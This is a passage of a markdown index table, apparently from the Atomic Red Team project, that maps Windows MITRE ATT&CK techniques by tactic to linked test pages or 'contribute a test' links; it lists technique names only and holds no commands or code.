| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Service](../../T1543.003/T1543.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | [Windows Service](../../T1543.003/T1543.003.md) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Office Test](../../T1137.002/T1137.002.md) | [Port Monitors](../../T1547.010/T1547.010.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
